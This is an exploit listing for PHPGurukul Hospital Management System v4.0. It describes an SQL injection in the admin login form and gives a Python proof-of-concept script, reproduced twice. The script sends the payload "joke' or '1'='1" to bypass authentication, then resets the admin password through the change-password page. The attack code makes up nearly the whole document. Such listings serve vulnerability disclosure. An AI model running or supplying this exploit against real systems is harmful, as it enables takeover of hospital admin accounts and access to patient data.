# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows
# Description:
# Password and username parameters have sql injection vulnerability
on admin panel.
# username: joke' or '1'='1 , password: joke' or '1'='1
# Exploit changes password of admin user.
#!/usr/bin/python
import requests
import sys
if (len(sys.argv) !=2) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath"
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
exit(0)
rhost = sys.argv[1]
npasswd = str(raw_input("Please enter at least six characters for new password: "))
url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or
'1'='1", "submit": "", "submit": ""}
#login
with requests.Session() as session:
lpost = session.post(url=url, data=data, headers = {"Content-Type":
"application/x-www-form-urlencoded"})
#check authentication bypass
check = session.get("http://"+rhost+"/hms/admin/dashboard.php",
allow_redirects=False)
print ("[*] Status code: %s"%check.status_code)
if check.status_code == 200:
print "[+] Authentication bypass was successful!"
print "[+] Trying to change password."
elif check.status_code == 404:
print "[-] One bad day! Check target web application path."
sys.exit()
else:
print "[-] One bad day! Authentication bypass was unsuccessful! Try
it manually."
sys.exit()
#change password
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"",
"cfpass": ""+npasswd+"","submit":""}
cgpasswd =
session.post("http://"+rhost+"/hms/admin/change-password.php",
data=cgdata, headers = {"Content-Type":
"application/x-www-form-urlencoded"})
if cgpasswd.status_code == 200:
print ("[+] Username is: admin")
print ("[+] New password is: %s"%npasswd)
else:
print "[-] One bad day! Try it manually."
sys.exit()
hospital_poc.py
#!/usr/bin/python
import requests
import sys
if (len(sys.argv) !=2) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath"
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
exit(0)
rhost = sys.argv[1]
npasswd = str(raw_input("Please enter at least six characters for new password: "))
url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or
'1'='1", "submit": "", "submit": ""}
#login
with requests.Session() as session:
lpost = session.post(url=url, data=data, headers = {"Content-Type":
"application/x-www-form-urlencoded"})
#check authentication bypass
check = session.get("http://"+rhost+"/hms/admin/dashboard.php",
allow_redirects=False)
print ("[*] Status code: %s"%check.status_code)
if check.status_code == 200:
print "[+] Authentication bypass was successful!"
print "[+] Trying to change password."
elif check.status_code == 404:
print "[-] One bad day! Check target web application path."
sys.exit()
else:
print "[-] One bad day! Authentication bypass was unsuccessful! Try
it manually."
sys.exit()
#change password
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"",
"cfpass": ""+npasswd+"","submit":""}
cgpasswd =
session.post("http://"+rhost+"/hms/admin/change-password.php",
data=cgdata, headers = {"Content-Type":
"application/x-www-form-urlencoded"})
if cgpasswd.status_code == 200:
print ("[+] Username is: admin")
print ("[+] New password is: %s"%npasswd)
else:
print "[-] One bad day! Try it manually."
sys.exit()
